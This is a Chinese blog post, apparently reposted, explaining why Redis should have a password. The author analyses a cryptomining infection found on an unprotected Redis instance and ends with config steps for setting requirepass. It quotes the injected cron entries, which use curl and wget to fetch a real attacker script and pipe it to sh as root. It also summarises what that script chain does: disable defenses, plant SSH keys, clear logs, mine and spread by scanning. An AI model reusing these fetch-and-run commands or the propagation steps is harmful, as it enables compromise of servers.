服务器之家:专注于VPS、云服务器配置技术及软件下载分享
分类导航

Mysql|Sql Server|Oracle|Redis|MongoDB|PostgreSQL|Sqlite|DB2|mariadb|Access|数据库技术|

服务器之家 - 数据库 - Redis - 一文详解Redis为什么一定要设置密码原理

一文详解Redis为什么一定要设置密码原理

2023-03-15 17:03佳庆 Redis

这篇文章主要为大家介绍了Redis为什么一定要设置密码原理详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪

为什么redis要设置密码?

内网环境可以不设置密码,但是个人服务器,以及线上公网服务器就有必要设置密码了。

昨天我查看了一下minio的redis事件通知,查看redis的key时发现多了几个奇怪的key。backup1,backup2,backup3。然后我猜想应该是挖矿病毒。

如下面所示:这样就将定时任务和脚本注入到了我们机器当中,就会开始执行 init.sh 脚本

backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"

init.sh脚本内容是什么?

en2an.top/cleanfda/in…

我们查看这个key的value能得到它会去请求一个地址,我们打开看一下这个init.sh到底是什么东西。

如下图所示是个脚本文件。

一文详解Redis为什么一定要设置密码原理

这个脚本还挺多的,关闭selinux、杀掉别人的挖矿进程、杀掉CPU占用过高的进程,如果是自己就跳过、修改破坏系统命令、自己造一个下载器downloads()函数、解锁和加锁定时任务、添加挖矿技术任务、设置SSH免密登陆、下载执行矿机挖矿程序、关闭防火墙、清除日志、感染已知的免密机器、下载执行is.sh。

is.sh脚本内容是什么?

en2an.top/cleanfda/is…

如下图所示,上面的init.sh会下载我们的is.sh脚本。

一文详解Redis为什么一定要设置密码原理

我们看一下这个脚本是干什么。

如下图所示,这个脚本的内容也挺多的。下载masscan扫描器、下载pnscan扫描器、安装 redis 用于创建 redis 未授权访问的漏洞、执行 rs.sh。

一文详解Redis为什么一定要设置密码原理

rs.sh脚本内容是什么?

en2an.top/cleanfda/rs…

上面的连接可以查看这个脚本内容是什么。

一文详解Redis为什么一定要设置密码原理

开放 6379 端口、自动化利用redis未授权写入定时任务,利用 pnscan 扫描b段IP 6379 端口,利用 masscan 进行扫描端口。

Redis如何设置密码?

经过以上分析,就知道这个病毒主要是通过你的redis注入进去执行挖矿脚本。如果你的redis没有设置密码,而且暴露在公网上就要小心了。

可以通过以下两种方式对我们的redis进行设置密码。

方式一:修改我们的redis.conf配置文件

需要注意的是这种方式因为修改了配置文件, 需要重新启动我们的redis才能生效。

找到我们的redis.conf文件。

Windows如下图所示

一文详解Redis为什么一定要设置密码原理

我们编辑此文件,找到requirepass,放开注释,设置指定的值就,重启redis就生效了。

一文详解Redis为什么一定要设置密码原理

Linux的话,因为大家的安装方式可能不同,我这边是通过docker安装的,做了映射的。这里就不给大家演示了,找到自己安装在linux的redis目录找到redis.conf配置文件,跟windows一样的操作,配置完重启就Ok了。

方式二

连接我们的redis,然后通过指令的方式设置密码。

这种方式比较简单,而且不需要重启就生效。

下面的指令的意思就是把密码设置为123456,公网可不要设置这么简单阿。

config set requirepass 123456

我们查看一下我们的redis的密码。

config get requirepass 

这样我们的密码就设置成功了,退出我们的redis客户端再次连接的时候就生效了。

总结

公网的redis一定要设置密码阿,不要不设置密码,设置密码就一个指令,非常容易,可不要偷懒噢。

以上就是一文详解Redis为什么一定要设置密码原理的详细内容,更多关于Redis设置密码的资料请关注服务器之家其它相关文章!

原文链接:https://juejin.cn/post/7209542304864288828

延伸 · 阅读

精彩推荐
  • Redis详解redis分布式锁的这些坑

    详解redis分布式锁的这些坑

    在很多互联网产品应用中,有些场景需要加锁处理,比如:秒杀,全局递增ID等等。大部分的解决方案是基于DB实现的,Redis为单进程单线程模式,采用队列...

    华为云开发者社区4312021-08-04
  • RedisNoSQL和Redis简介及Redis在Windows下的安装和使用教程

    NoSQL和Redis简介及Redis在Windows下的安装和使用教程

    这篇文章主要介绍了NoSQL和Redis简介及Redis在Windows下的安装和使用教程,本文同时讲解了python操作redis,并给出了操作实例,需要的朋友可以参考下 ...

    junjie5552019-10-21
  • RedisRedis分布式锁解决秒杀超卖问题

    Redis分布式锁解决秒杀超卖问题

    本文主要介绍了Redis分布式锁解决秒杀超卖问题,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面...

    艳梓9442022-07-13
  • Redis使用Redis实现点赞取消点赞的详细代码

    使用Redis实现点赞取消点赞的详细代码

    这篇文章主要介绍了Redis实现点赞取消点赞的详细代码,通过查询某实体(帖子、评论等)点赞数量,需要用到事务相关知识,结合示例代码给大家介绍的非常...

    总是幸福的老豌豆8562022-10-11
  • RedisRedis列表类型的常用命令小结

    Redis列表类型的常用命令小结

    这篇文章给大家整理了在操作Redis列表类型中的常用命令,文章总结的很全面,对大家学习Redis具有一定的参考借鉴价值,下面来一起看看吧。 ...

    daisy3722019-10-30
  • RedisRedis分布式限流组件设计与使用实例

    Redis分布式限流组件设计与使用实例

    本文主要讲解基于 自定义注解+Aop+反射+Redis+Lua表达式 实现的限流设计方案。实现的限流设计与实际使用。具有一定的参考价值,感兴趣的小伙伴们可以参...

    程序员小强5272021-09-16
  • RedisRedis通过scan查找不过期的 key(方法详解)

    Redis通过scan查找不过期的 key(方法详解)

    SCAN 命令是一个基于游标的迭代器,每次被调用之后, 都会向用户返回一个新的游标, 用户在下次迭代时需要使用这个新游标作为 SCAN 命令的游标参数,...

    __Yoon11102021-09-17
  • RedisRedis瞬时高并发秒杀方案总结

    Redis瞬时高并发秒杀方案总结

    本文讲述了Redis瞬时高并发秒杀方案总结,具有很好的参考价值,感兴趣的小伙伴们可以参考一下,具体如下: ...

    Brady志国5272019-11-13